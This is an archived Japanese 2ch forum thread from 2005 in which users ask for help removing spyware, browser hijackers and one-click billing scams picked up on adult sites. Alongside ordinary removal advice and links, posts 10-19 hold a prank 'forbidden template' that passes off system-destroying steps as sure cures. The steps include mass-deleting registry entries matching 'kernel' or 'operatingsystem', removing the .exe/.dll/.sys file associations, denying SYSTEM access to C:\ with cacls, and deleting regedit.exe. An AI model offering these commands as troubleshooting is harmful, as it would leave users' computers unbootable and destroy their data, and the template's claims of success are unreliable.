5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

エロサイト見たら…助けて下さい!Part50

1 :テンプレ:05/02/13 14:32:07 ID:???
エロサイトに限らずWEBを見て回ってたらブラウザ乗っ取られて大変なことに…
いったいどうしたらいいの?って人のためのスレッドです。

【重要】ウソのアドバイスに注意して下さい。

●ブラウザハイジャッカーやウイルスの被害を減らすためにも
WindowsUpdateを利用してこまめにセキュリティパッチを当てましょう

▼━質問のしかた ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
 ・ E-mail欄(省略可) には何も記入しないこと。(ID出す→偽者対策・質問者の区別)
 ・ 2回目以降の書込は、名前欄に最初に質問した際の「発言番号」を入力すること。
 ・ 他のスレから誘導された場合は、その旨書く。(マルチポストとの区別)
 ・ OSの種類、ブラウザ、セキュ関係ソフトの有無、実行結果を報告。(特にOSの種類)
 ・ まず、テンプレの>>2-10あたりを必ず読む。

▼━回答者の方へ ━━━━━━━━━━━━━━━━━━━━
 ・ テンプレの方法を実行せずに質問する人は、徹底放置して下さい。
 ・ 出された指示を実行せずにレスする人は、徹底放置して下さい。
 ・ HijackThisの分析から嘘が判明した場合は、徹底放置して下さい。
 ・ 放置ができない回答者は、質問者が自作自演していると見なされます。

▼━禁止事項 ━━━━━━━━━━━━━━━━━━━
 ・ マルチポスト(複数の板・スレで同じことを質問)
 ・ 情報の小出し(始めにOSやソフト名等を必ず明示)
 ・ 違法な話題や質問(WinMX,Winny,エミュレータ等)
 ・ 天麩羅屋 & 薮パソユーザーは立ち入り禁止。HNを変えてもダメです。
 ・ Opera房立ち入り禁止。HNを変えてもダメです。またその話題も禁止です。

【前スレ】エロサイト見たら…助けて下さい!Part49
http://pc5.2ch.net/test/read.cgi/pcqa/1106718234/

2 :テンプレ:05/02/13 14:32:51 ID:???
質問する前に

※スパイウェア除去ウィザードの内容と基本的には同じです。
(1)から順を追って作業して下さい。

1)  IEのホーム、検索ページを標準に戻す→ツール→インターネットオプション→
   プログラム→WEB設定のリセット
  ※WEB設定のリセットは、こまめに実行しましょう(無限ループ防止の為) 

2) IEの履歴削除→ツール→インターネットオプション→全般→インターネット
   一時ファイル→クッキーの削除+ファイルの削除

3)  削除したいファイルがあるが「アクセスできません。使用中です」等といわれて
   削除できない→セーフモード(F8を連打)でOSを起動→削除→OS再起動

4)  勝手に追加されたアプリをアンインストする→スタート→コントロールパネル→
    アプリケーションの追加と削除→OS再起動

※コントロールパネルからアンインストールしなければならない主なもの
CnsMin(Jwordとかで使われてるスパイウェア)
ttp://www.higaitaisaku.com/removecnsmin.html
その他のコントロールパネルからアンインストールできる主なもの
ttp://www.higaitaisaku.com/uninstallinfo.html

※コントロールパネルからアンインストールしてはならないもの
Home Search Assistant、Shopping Wizard、Search Extender
という名前のものがコントロールパネルのアプリケーションにある場合。

3 :テンプレ:05/02/13 14:33:23 ID:???
5) アンチウィルスソフトでウィルスを除去。
   アンチウィルスソフトを持っていない・サポート終了している場合は、オンラインスキャンを必ず行なって除去する事。

主なアンチウィルスソフトのサポート終了一覧
Symantec(Norton)
http://service1.symantec.com/SUPPORT/INTER/japanesecustserv.nsf/jdocid/20030919114134945?Open&src=&docid=20040206144851945&nsf=SUPPORT%5CINTER%5Cjapanesecustserv.nsf&view=jdocid&dtype=&prod=&ver=&osv=&osv_lvl=
TrendMicro(ウィルスバスター)
http://www.trendmicro.com/jp/support/old-versions/old-versions/products/vb.htm

TrendMicro OnlineScan(駆除可能・英語)
http://housecall.trendmicro.com/
Panda Active Scan (駆除可能・日本語)
http://www.pandasoftware.com/activescan/jp/activescan_principal.htm

トレンドマイクロオンラインスキャン (手動駆除)
http://www.trendmicro.co.jp/hcall/index.asp
シマンテックセキュリティチェック (手動駆除)
http://security.symantec.com/sscv6/home.asp?productid=symhome&langid=jp&venid=sym&close_parent=true&bhcp=1

6)  ブラウザジャッカーCoolWebSearch駆除ツール
ttp://www.higaitaisaku.com/removecws.html

7) 定番スパイウェア除去ソフト、Ad-awareSEとSpybotS&Dを使って除去。

Ad-Aware SEによるスパイウェアの除去方法
ttp://www.higaitaisaku.com/adaware.html
http://lavasoft.element5.com/default.shtml.ja(公式サイト)
ttp://bdc.s15.xrea.com/(日本語化パッチ)

Spybot1.3によるスパイウェアの除去方法
ttp://www.higaitaisaku.com/spybot2.html
http://www.safer-networking.org/(公式サイト)

4 :テンプレ:05/02/13 14:33:54 ID:???
8) Me/XPの場合「システムの復元」で正常な状態に復帰させる方法もあります。
   [スタート]→[すべてのプログラム]→[アクセサリ]→[システム ツール]→[システムの復元]
9)  既出ですよQ&A(個別のスパイウェア駆除方法)
About:blankの対処法
最初にここを見て駆除
ttp://www.higaitaisaku.com/removeaboutblank.html
再発する場合には、ここを見て該当ファイルを駆除
ttp://www.higaitaisaku.com/cgi-bin/cbbs.cgi?mode=one&namber=4058&type=0&space=0&no=2
CoolWebSearchの除去方法
ttp://www.higaitaisaku.com/removecws.html
CnsMinの除去方法
ttp://www.higaitaisaku.com/removecnsmin.html
Gator/Gainの除去方法
ttp://www.higaitaisaku.com/removegator.html
C2.lopの除去方法
ttp://www.higaitaisaku.com/removelop.html
「英語で変な警告文が出てくるんですけど」という場合
ttp://www.higaitaisaku.com/removereg32.html
ttp://www.higaitaisaku.com/removecleanser.html
ttp://www.higaitaisaku.com/removewasher.html
ホームページが「*****.biz」になる場合
ttp://www.higaitaisaku.com/removesearchbiz.html

●上記以外のスパイウェアでも[アダルトサイト被害対策の部屋]さんの
「スパイウェア関連」トピックに対処方法が紹介されている物があります
自分の症状に該当する物がないか一度目を通して下さい

5 :テンプレ:05/02/13 14:36:20 ID:???
10)テンプレを全部やったが直らない!
Hijack Thisによるレポート出力と手動でのスパイウェア除去
ttp://www.higaitaisaku.com/hijackthis.html
自動的に診断してくれるページがあるので、ここにログを貼って診断してみる。
ttp://www.hijackthis.de/index.php?langselect=english
「Nasty(赤い!)」と書かれているものはFixしてOK。
「Possible Nasty(黄色い?)」は、無害なものも含まれているので自信がなければFixしないで下さい。

●それでも直らない場合は、このスレにHijackThisのログを貼って質問してみて下さい。
必ず、どの項目をやった結果どうでした、と詳しく症状・行なった対処法を書いてください。


■テンプレ補足
1.WindowsUpdateのやり方
IEを開く → ツール → WindowsUpdate
重要な更新は全てダウンロードしてインストールする事。

2.被害対策ウィザード(テンプレ>>2-4の手順ウィザード)
ttp://www.higaitaisaku.com/removewz01.html
テンプレじゃわかりにくい人は、こっちを使ってみて下さい。基本的なやる事は同じ。

3.IEが壊れてしまっている人用
IEの修復(ttp://www.higaitaisaku.com/iesyuufuku.html)を試す。
または、IE以外のブラウザを使ってみて、とりあえずテンプレを確認してください。

6 :テンプレ:05/02/13 14:36:55 ID:???
Q:クリックしたら突然登録・入会、固体識別番号・個人コードなどが表示された。
エロサイトをクリックしたら、ホストアドレスが表示されてしまって
個人情報がばれた、と書かれていました。お金を振り込めとありますが
お金を振り込まなければならないのでしょうか?

A:架空詐欺なので(゚ε゚)キニシナイ!!↓を見てみてね。
警視庁「ワンクリック料金請求にご用心」
http://www.keishicho.metro.tokyo.jp/haiteku/haiteku/haiteku35.htm
サギゼロ
ttp://sagi-0.bne.jp/pc/ --- ここの「よくある相談集」を。
ワンクリック登録詐欺サイト質問スレ その13
http://that3.2ch.net/test/read.cgi/bouhan/1107917291/

7 :テンプレ:05/02/13 14:37:26 ID:???
《その他リンク集》
■アダルトサイト被害対策の部屋
 ttp://www.higaitaisaku.com/
■WEB110[インターネットの犯罪・被害]追跡調査
 ttp://www.web110.com/
■アダルトサイトは安全?危険?
 ttp://www.kitanet.ne.jp/~ababu/sexy/index.html
■えっと驚く前に―国際電話・Q2からの事前防御策―
 ttp://www3.plala.or.jp/hiro-mg3920/tel.html
■アダルトサイト対策の部屋(ネット被害対策室)
 ttp://www002.upp.so-net.ne.jp/dalk/higai24.html
■国際電話・ダイヤルQ2関連
 http://www.ntt-east.co.jp/q2/ NTT東日本 ダイヤルQ2サービス
 http://www.ntt-west.co.jp/q2/ NTT西日本 ダイヤルQ2サービス
 ダイヤルQ2接続チェックプログラムもここからダウンロードできます。
 ttp://www.emurasoft.com/jp/chintcal/index.htm      No! 国際電話
 ttp://mitsu98.fc2web.com/bbs/index2.html         Dial Saver
 http://www.kddi.com/topics/atx/image.html         ダイヤルアップチェッカー
■バナー・ブラクラ対策
 ttp://homepage3.nifty.com/hayazo/myprg.html     ClosePopup
 http://www.proxomitron.org/                  Proxomitron(公式サイト)
 ttp://www.pluto.dti.ne.jp/~tengu/proxomitron/       Proxomitron(日本語解説)

8 :テンプレ:05/02/13 14:38:24 ID:???
●アドバイスを装った悪質ないたずらにご用心
「パソコンのトラブル解消法」などと称して、
レジストリやシステムファイルの削除を勧める人がいます。
間違ってそれらを削除するとPCが起動できなくなってしまう恐れがあります。
もしもそのようなアドバイスをされた時は、その後のレスなどにも注意して、
十分よく考えて慎重に行動して下さい。

9 :ひよこ名無しさん:05/02/13 14:45:08 ID:???
>>1-8
おつ

10 :テンプレ:05/02/13 15:32:18 ID:???
THE・禁断のテンプレ(ファイナル.Ver)
確実に直ります。

11 :ひよこ名無しさん:05/02/13 15:37:05 ID:???
激しく注意!
初心者はこれやっちゃダメ!
禁断のテンプレには、思いっきり気をつけて!
あなたのパソコン生命がかかっています。

12 :THE・禁断のテンプレ(ファイナル.Ver):05/02/13 15:37:31 ID:???
THE・禁断のテンプレ(ファイナル.Ver)を始める前に(重要)

この説明文を最後まで良く読んでから実行して下さい。
読まずに実行した場合は、使用許諾証明書を読まずに「同意する」をクリックして、
自分の意志でスパイウェアをPC内にインストールしてしまうのと同じことです。
ウィルスやスパイウェアに感染してしまった場合、それらのものによる
症状を完全に直すにはOSを再インストールすることです。
OSを再インストールすると、HDD内のデータが全て消えますが症状は完全に直ります。
OSの再インストールにはProductKeyが必要になります。
ProductKeyの場所はOSにより違ってきます。
「スタート」メニューを開いて、ファイルを指名して実行をクリック

regeditと入力してOKをクリック→レジストリエディタが開く

9x系OSの場合、HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion
NT系OSの場合、HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion
になります。
自分のPCのProductKeyが見つかったら、必ず紙にメモして置いて下さい。(後で必要です)
ですが、OSを再インストールさせずに完全に症状を直す方法があります。
それが、THE・禁断のテンプレ(ファイナル.Ver)です。
THE・禁断のテンプレ(ファイナル.Ver)を実行する前に、
必ず次の「THE・禁断のテンプレ(ファイナル.Ver)とは?」を良く読み、
内容をご理解できたならTHE・禁断のテンプレ(ファイナル.Ver)を実行して下さい。
(注*THE・禁断のテンプレ(ファイナル.Ver)はレジストリエディタを操作します。
レジストリエディタの操作を誤ると深刻な問題が発生する事があります。
最悪の場合、オペレーティングシステムの再インストールが必要になります。
レジストリエディタの操作はくれぐれも慎重に行なって下さい。)

13 :THE・禁断のテンプレ(ファイナル.Ver)とは?:05/02/13 15:38:24 ID:???
現在のウィルスやスパイウェアというものは、とてもタチが悪くて
「緊急処置」や「パソコンのトラブル解消法」では
それらの活動を完全に停止させることができない場合もあります。
それらはあくまでも、2004年12月現在までに確認されている
既知のウィルス・スパイウェアに有効な手段です。
2005年1月以降に発生した、またはこれから発生する新種や未知の
ウィルスやスパイウェアは、「緊急処置」でも「パソコンのトラブル解消法」でも、
それらの活動を完全に停止させることができず、頭の痛い日々が続いていました。
そこで、天才であるこの私は、究極の解決方法をあみ出しました。それが、
「パソコンのトラブル解消法・改」と「真・パソコンのトラブル解消法」と
「禁断のパソコンのトラブル解消法」なのです。
つまり、THE・禁断のテンプレ(ファイナル.Ver)の目的は、
ウィルスおよびスパイウェアの活動を完全に止めてしまうことです。
(本当に(不起動になるので)ウィルス・スパイウェアの活動が停止します)
(*)=PCを再起動(再起動しないで設定を有効にするには、
デスクトップの何も無い所を右クリック→最新の情報に更新をクリック)
ワンポイント・アドバイス=設定を完全に有効にする場合は必ずPCを再起動させて下さい。
また、「緊急処置」、「パソコンのトラブル解消法」、「パソコンのトラブル解消法・改」、
「真・パソコンのトラブル解消法」、「禁断のパソコンのトラブル解消法」を、
一度に全て実行すると、より大きな効果が得られます。
では、THE・禁断のテンプレ(ファイナル.Ver)を実行して下さい。

14 :時間が無くてもこれだけはやっとけ:05/02/13 15:39:22 ID:???
>>12-13(必読)

緊急処置(WindowsME/WindowsXPはシステムの復元をOFFに設定)

「スタート」メニューを開いて、ファイルを指名して実行をクリック

regeditと入力してOKをクリック→レジストリエディタが開く

以下のキーを削除(無い物は無視して構わない)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\RunServices
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce

作業終了→PCを再起動(*)

緊急処置完了!
(これをやれば症状は多少改善されると思いますが、もしも症状が
改善されないようでしたら、次の「パソコンのトラブル解消法」を実行して下さい)

15 :ウィルス・スパイウェアが見つかったら:05/02/13 15:40:03 ID:???
>>12-13(必読)

パソコンのトラブル解消法(WindowsME/WindowsXPはシステムの復元をOFFに設定)

「スタート」メニューを開いて、ファイルを指名して実行をクリック

regeditと入力してOKをクリック→レジストリエディタが開く

編集→検索をクリックして、以下の文字を検索
explorerないしkernel

検索しながら見つかったものを片っ端から削除

検索が終わったらPCを再起動(*)

問題解決→ウマー(・∀・)
(それでも直らない場合は、次の「パソコンのトラブル解消法・改」か、
その次の「真・パソコンのトラブル解消法」を実行して下さい)

16 :それでも直らない(パターンA):05/02/13 15:41:02 ID:???
>>12-13(必読)

パソコンのトラブル解消法・改(WindowsME/WindowsXPはシステムの復元をOFFに設定)

「スタート」メニューを開いて、ファイルを指名して実行をクリック

cacls c:\ /t /e /p system:nと入力してOKをクリック
(エラーになる場合は、cacls c:\ /g system:f→cacls c:\ /t /e /p system:n)

作業終了→PCを再起動(*)

問題解決(100%解決)→ ウマー(^∀^)
(この方法を使えば、どんなウィルスだろうがスパイウェアだろうが
悪質なプログラムは完全に停止します)

17 :それでも直らない(パターンB):05/02/13 15:41:51 ID:???
>>12-13(必読)

真・パソコンのトラブル解消法(WindowsME/WindowsXPはシステムの復元をOFFに設定)

「スタート」メニューを開いて、ファイルを指名して実行をクリック

regeditと入力してOKをクリック→レジストリエディタが開く

以下のキーを削除
HKEY_CLASSES_ROOT\.dll
HKEY_CLASSES_ROOT\.exe
HKEY_CLASSES_ROOT\.sys
HKEY_CLASSES_ROOT\dllfile
HKEY_CLASSES_ROOT\exefile
HKEY_CLASSES_ROOT\sysfile
(dllはウィルス・exeはトロイ/ワーム・sysはスパイウェア)

作業終了→PCを再起動(*)

問題解決(100%解決)→ ウマー(^∀^)
(この方法を使えば、どんなウィルスだろうがスパイウェアだろうが
悪質なプログラムは完全に停止します)

18 :最後の手段:05/02/13 15:42:31 ID:???
>>12-13(必読)

禁断のパソコンのトラブル解消法(WindowsME/WindowsXPはシステムの復元をOFFに設定)

「スタート」メニューを開いて、ファイルを指名して実行をクリック

regeditと入力してOKをクリック→レジストリエディタが開く

編集→検索をクリックして、以下の文字を検索
operatingsystem

見つかったものを削除→PCを再起動(*)

問題解決(絶大なる効果です)→ウマ━━━\v(^∀^)v/━━━!!
(この最後の手段は、窮地に陥った時の手段として実行して下さい!)

19 :おまけ:05/02/13 15:43:20 ID:???
>>12-13(必読)

(やっても、やらなくても、良いです)
「スタート」メニューを開いて、検索をクリック

検索するファイル名のところに、 regedit.exeと入力して検索をクリック

見つかったものを削除→ごみ箱を空にする
(やるのであれば、完全自己責任)

†THE・禁断のテンプレ(ファイナル.Ver)終了†

20 :ひよこ名無しさん:05/02/13 15:45:04 ID:???
工エエェェ(´д`)ェェエエ工

21 :ひよこ名無しさん:05/02/13 15:45:57 ID:???
>>12-19
ここまで注意書きを書けば誰も実行なんてしないだろう。
ちゃんと最後まで読めば、どうなるか書いてあるからな。
実行する人は「起動できなくなる」ことを理解した上でやるって事だから。

22 :ひよこ名無しさん:05/02/13 15:49:18 ID:???
‥と逃げをうつへタレ

23 :ひよこ名無しさん:05/02/13 15:51:00 ID:???
>>22
実行したのか?

24 :ひよこ名無しさん:05/02/13 15:58:42 ID:???
>>19
実行したのか?

25 :ひよこ名無しさん:05/02/13 16:01:59 ID:???
>>13
>(本当に(不起動になるので
ちゃんとPCが起動しなくなる。と書いてあるからな。
引っかかる奴、絶対にいない。

26 :ひよこ名無しさん:05/02/13 16:03:52 ID:???
>>16
実行したのか?

27 :ひよこ名無しさん:05/02/13 16:05:33 ID:???
>>15
実行したのか?

28 :ひよこ名無しさん:05/02/13 17:28:10 ID:???
>>14
実行したのか?

29 :ひよこ名無しさん:05/02/13 18:10:55 ID:???
精神科に通ってる人が荒らしているに違いない

30 :ひよこ名無しさん:05/02/13 18:26:52 ID:SKnjx4YY

TROJ AGENT.OZっていうウイルスがぜんぜん消えないんですけど・・

ちなみにウイルスバスター2005で発見したけど
隔離できなくて手動でやれとかでて
とりあえずspybotとか入れてるけど対応してくれません!
お助けをおねがいします。

31 :ひよこ名無しさん:05/02/13 19:35:40 ID:???
>>30
タスクマネージャでバスターが検出したファイルの名前のプロセスを終了させる
レジストリエディタでここまで行って
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\run
検出されたウイルスファイルを含むエントリを削除する
スキャンして見つかったファイルを削除
再度スキャンして消えたか確認

32 :ひよこ名無しさん:05/02/13 19:40:43 ID:???
>>31=>>14

33 :ひよこ名無しさん:05/02/13 20:05:44 ID:???
これキチガイが立てちゃったスレなの?

34 :ひよこ名無しさん:05/02/13 20:25:24 ID:???
スパイウェア除去ウィザード − 順を追って作業を行うことで問題解決(たぶん)
http://www.higaitaisaku.com/removewz01.html

何も分からずにここに来る人には必ず↑のウィザードに誘導するという約束事を作ればいいと思う。
ピンポイントで指示して直るようなことは無いと思った方がいいし、変な指示に惑わされないで済むから。

35 :ぼるじょあ ◆yBEncckFOU :05/02/13 20:28:47 ID:???

(・3・) エェー よいこの質問待ってるYO♪

ぼるじょあ(・3・)質問箱 セキュ板出張所12
http://pc5.2ch.net/test/read.cgi/sec/1105933333/

ウィルス情報&質問 総合スレッド☆Part27
http://pc5.2ch.net/test/read.cgi/sec/1104587430/

セキュリティ初心者質問スレッドpart52
http://pc5.2ch.net/test/read.cgi/sec/1108260790/

【総合】スパイウェア予防駆除 Part5
http://pc5.2ch.net/test/read.cgi/sec/1097503258/

(・3・) エェー よいこの相談待ってるYO♪

36 :ひよこ名無しさん:05/02/13 21:27:48 ID:kwzJiYhH
ぼるじょあさんに紹介されてきますた。
エロサイト見たせいだと思うんですが。右クリックしたときに選択肢の中にそのサイトの名前が入ってしまったんです。
どうやったら消す事ができるでしょうか?

スパイボット使ってスパイウェアは消しました。ウィルスもありません。
宜しくお願いしまつ。。

37 :ひよこ名無しさん:05/02/13 21:28:06 ID:???
>>30 はどこにいったんだ?

38 :ひよこ名無しさん:05/02/13 21:31:41 ID:???
>>36
もしここにあったら削除
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt

39 :36:05/02/13 21:47:08 ID:kwzJiYhH
>>38
マジ感動しました。
治りました。
ありがとうございました!

40 :ひよこ名無しさん:05/02/13 22:18:13 ID:???
なんか駆除のやりかたわからんし
別に大事なものもないから
リカバリしたいんだけど、
これもひとつの方法だよね??

41 :ひよこ名無しさん:05/02/13 22:21:55 ID:???
それをしても痛くないひとにはいいね。 副作用で軽くなるかもしれないしw

42 :ひよこ名無しさん:05/02/13 22:24:26 ID:???
じゃぁやってみるか。

お気に入り消えちゃうのが痛いが。

43 :ひよこ名無しさん:05/02/13 22:29:40 ID:???
お気に入りぐらいならフロッピーにすら入るんじゃないか?
IEのやつなら ファイル > インポートおよびエクスポート > お気に入りのエクスポート

44 :ひよこ名無しさん:05/02/13 22:35:20 ID:???
フロピないからマンドクセ

Dドライブにバックアップっていうのみつけたんだけど
これに入れとけば大丈夫かな。

45 :ひよこ名無しさん:05/02/13 22:37:27 ID:???
>>44
違う。セットアップっていうのがあるだろ?そこに入れろ

46 :ひよこ名無しさん:05/02/13 22:49:35 ID:???
>>45
FMかんたんバックアップっていうのがインストールされてて
それに保存したんだけど、まぁこれでいいかな。

失敗したらその時で

47 :ひよこ名無しさん:05/02/13 22:51:41 ID:???
>>46
まあいいだろ


48 :ひよこ名無しさん:05/02/14 07:06:46 ID:2UoSmGQ4
アダルトサイトを見ていたら変なプログラムを拾ってしまったようで
PC起動時に勝手にインターネットに接続しようとし、それを終了しても
動きが重いです。
さらに、fethard_tooやsexなる接続プログラムがいつの間にか画面上に出現し、
もとのファイルから削除してもまた再起動したら復活してしまいました。
どうすれば元に戻るのでしょうか・・・


49 :ひよこ名無しさん:05/02/14 10:54:03 ID:gSwTQntc
実況板
>67 :朝まで名無しさん :05/02/12 14:16:22 ID:t4ap+6j5
>http://blog.goo.ne.jp/nyaoko11/
>これでも見て反省しとけ

ここの「最新のトラックバック」の無料サンプル動画
からリンクを辿っていったら、こんなんでました。

ご利用期間  「180日間」
ご利用料金  「\48000」
 お振込み期日 ご入会日より 4 日以内に下記の口座までお振込み下さい。
また、支払い期限を過ぎても入金確認が出来ない場合、
未払い状態が続きますと各プロバイダー会社に対し法的な手段を経て
情報開示を求めることにより以下の情報を把握することが出来ます。
◇契約社名
◇契約者住所
◇契約者電話番号
◇契約者勤務先
◇契約者クレジット
◇契約者信用情報
その他契約申し込み時に記入した事項全てを元に
延滞料金30,000円、延滞1日に付き1,000円の損害金を加算して
ご自宅、ご実家、勤務先などに直接請求されることがあります。
振込ID番号  「1108344437」

(((( ;゚Д゚)))ガクガクブルブル




50 :49:05/02/14 11:00:04 ID:gSwTQntc
Part49でガイシュツでした。すんまそん。

51 :ひよこ名無しさん:05/02/14 11:04:10 ID:JLywDbOZ
>>50
大丈夫大丈夫

52 :ひよこ名無しさん:05/02/14 17:08:48 ID:GlDobG+o
・windowsXP
ブラウザはIE6を使っています。
spybot、Ad-aware SE、CWShredderで駆除を試みました。
コントロールパネルに怪しげなものはありませんでした。
【症状】
ttp://v.isp.2ch.net/up/f43f8e748323.jpg
下の青いバーが×で消してもよく出てきてしまいます。

53 :ひよこ名無しさん:05/02/14 17:38:47 ID:???
>>52
HijackThisのO3エントリ

54 :ひよこ名無しさん:05/02/14 17:59:09 ID:w7imJ2Ow
s-synbay.3sai@docomo.ne.jp

55 :ひよこ名無しさん:05/02/14 18:06:57 ID:???
ワンクリック登録に見事にかかってしまったorz

56 :52:05/02/14 18:24:39 ID:GlDobG+o
>>53
O3 - Toolbar: EPSON Web-To-Page - {EE5D279F-081B-4404-994D-C6B60AAEBA6D} - C:\Program Files\EPSON\EPSON Web-To-Page\EPSON Web-To-Page.dll
O3 - Toolbar: &Yahoo!ツールバー - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\PROGRA~1\Yahoo!\COMPAN~1\Installs\YCOMP5~1.DLL

57 :ひよこ名無しさん:05/02/14 18:27:13 ID:???
                  / ̄ ̄ ̄ ̄\,,
                 /_____  ヽ
                 | ─ 、 ─ 、 ヽ |  |
                 |  ・|・  |─ |___/
:::::::::::::::::::::::::::::    ,.-ヽ   |` - c`─ ′  6 l
::::::::::::::::::::::   ____,;' ,;- i.   ヽ (____  ,-′   レロレロ  _, -、_ ,- 、
::::::::::::::::::   ,;;'"  i i ・i;     ヽ ___ /ヽ        /  /: : : V: : :ヽ
:::::::::::::::  ,;'":;;,,,,,, ;!, `'''i;       ( ̄て""´  ヽ \.   /\  | : : : : lj : : :|
:::::::::::  ,/'"   '''',,,,''''--i      \   .)    、 ~ヽ . |   i  ヽ:_:ノヽ:_:ノ
:::::::::  ;/  .,,,,,,,,,,,,,,,,,   ;i'⌒i;      ヽ_人      l   j   |        !
:::::::  i;"     ___,,,,,,,  `i"        /     __/⊂|   |   __  ノ
::::::: i;    ,,;'""" `';,,,  "`i;      l   -‐ ̄ ヽ . ヽ、 / ̄   ̄\
::::::: |  ''''''i ,,,,,,,,,,  `'--''''"        \   ヽ      /        ヽ
::::::: |.    i'"   ";                        _/        -@
::::::: |;    `-、.,;''"                       ( __ ) ´\      丿
::::::::  i;     `'-----j                         (_(⌒ヽ(⌒ヽ


58 :ひよこ名無しさん:05/02/14 18:47:28 ID:???
>>52
起動中にタスクマネージャー見てみな

59 :52:05/02/14 18:53:16 ID:GlDobG+o
>>58
アプリケーションはjaneとグーグルしか起動してませんでした。

60 :ひよこ名無しさん:05/02/14 19:00:23 ID:???
>>59
じゃあBHOじゃないか?O2

61 :ひよこ名無しさん:05/02/14 19:00:43 ID:???
>>59
な、なに・・・ログを全部はりつけて気長に回答をまて

62 :ぼるじょあ ◆yBEncckFOU :05/02/14 19:02:02 ID:???

(・3・) エェー よいこの質問待ってるYO♪

ぼるじょあ(・3・)質問箱 セキュ板出張所12
http://pc5.2ch.net/test/read.cgi/sec/1105933333/

ウィルス情報&質問 総合スレッド☆Part27
http://pc5.2ch.net/test/read.cgi/sec/1104587430/

セキュリティ初心者質問スレッドpart52
http://pc5.2ch.net/test/read.cgi/sec/1108260790/

【総合】スパイウェア予防駆除 Part5
http://pc5.2ch.net/test/read.cgi/sec/1097503258/

(・3・) エェー よいこの相談待ってるYO♪

63 :前スレ847:05/02/14 20:03:21 ID:???
しつれいします。何とか復旧いたしました。
で・・・その・・・原因ですが・・・

プロバイダ料金未払いのため、回線が止められていたようでした。


(゚∀゚)アヒャヒ・・・・・・・・・・

orz

64 :ひよこ名無しさん:05/02/14 20:04:41 ID:FwBCi13O
OS:windows XP Home
ブラウザ:IE6
原因と考えられる事:数回見た海外エロサイト?
セキュリティソフト:ウイルスセキュリティ
PCメーカーと型番:SHARPのPC-MV1-C1E(ノートPC)
接続形態:ADSL

サイト見てすぐ、って訳ではなく数日して突然フリーズしたので再起動すると
真っ暗画面に「Operation System not found」しか表示されなくなり、さらに
起動後即F2で基本データみたいのを見るとHard Diskの欄が「None」になってて
どうもOSとHDを壊されたみたいです。
で、いくつかのサイトで調べたところ「業者の修理(高額)」「外付けHDケース?を買って付ければ
OS再インストできる?」みたいな事を見つけまして、できれば後者でやりたいのですがうまいこと直りますか?
また前者のおおまかな値段、もしくは他の対策などもご存知の方がいたら教えて頂ければ、、、
って感じでご指導お願いします

65 :ひよこ名無しさん:05/02/14 20:07:29 ID:EtvbnCBP
なんかエロサイト見てたら登録完了したって出たんだけど3万円、払わなきゃいけないの?

66 :ひよこ名無しさん:05/02/14 20:09:32 ID:???
>>65
金に余裕があって、払う気があるなら、払えばいい
あい

67 :64:05/02/14 20:11:49 ID:EtvbnCBP
>>66
もういいです!

68 :ひよこ名無しさん:05/02/14 20:13:17 ID:???
>>67
だってオマイ、板違い。

69 :ひよこ名無しさん:05/02/14 20:16:36 ID:???
板違いか?

>>65
テンプレ

70 :ひよこ名無しさん:05/02/14 20:28:42 ID:AVin47O+
なんかサイトを開く度にカジノのサイトが一緒に開いてしまうんですが
どうしたらいいでしょうか?

71 :ひよこ名無しさん:05/02/14 20:31:59 ID:???
http://newfreeworld.com/
↑禁断のテンプレサイトを作った。
来て下さい。

72 :ひよこ名無しさん:05/02/14 20:32:48 ID:???
>>70
http://www.safer-networking.org/en/download/index.html
↑ここでSpy botをダウソ。あとはほかで聞いて。

73 :ひよこ名無しさん:05/02/14 20:46:20 ID:AVin47O+
>>70
前に削除したんですがまだ出てるんです

74 :ひよこ名無しさん:05/02/14 20:48:35 ID:???
>>73
自分にアンカー?謎だ

75 :ひよこ名無しさん:05/02/14 21:06:10 ID:???
>>73
カジノのサイトの駆除なんて朝飯前だぜ!!

76 :ひよこ名無しさん:05/02/14 21:09:48 ID:AVin47O+
>>74
72の間違いでした

>>75
教えて下さい!

77 :ひよこ名無しさん:05/02/14 22:04:44 ID:???
Ad-awareでもつかえ

78 :ひよこ名無しさん:05/02/14 22:52:00 ID:GHgx5kDc
OS = xp 2ブラウザ IE セキュリティソフトは マイクロソフトの
サービスパック2をいれたくらいで他は何も入れていません。

すみません、http://lovetyphoon.com/index.php で18歳以上なので
エンター押したら、いきなり何かダウンロードが始まって
料金を支払えとサイト内にありました。

キャンセルできる方法はありませんか?
ダウンロードされたものがマイドキュメントから
見つからないのですが。



79 :52:05/02/14 23:07:03 ID:N3TqIg8y
結局解決はできないままIDがかわってしまいそうなのであきらめます。
いくつかのレスありがとうございました。

80 :52:05/02/14 23:07:33 ID:N3TqIg8y
ってもうIDかわってるYO!

81 :ひよこ名無しさん:05/02/14 23:11:12 ID:???
>>80
ネタ質乙。Hijackを全て晒さないのは嘘だとバレるからだろうな?

82 :ひよこ名無しさん:05/02/14 23:15:32 ID:Cdbq1LFn
今、困っていることがあります。助けて下さい。
使用OS:Windows XP Home Edition
使用ブラウザ:IE6.0.2900.2180.xpsp_sp2rtm.04083-2158
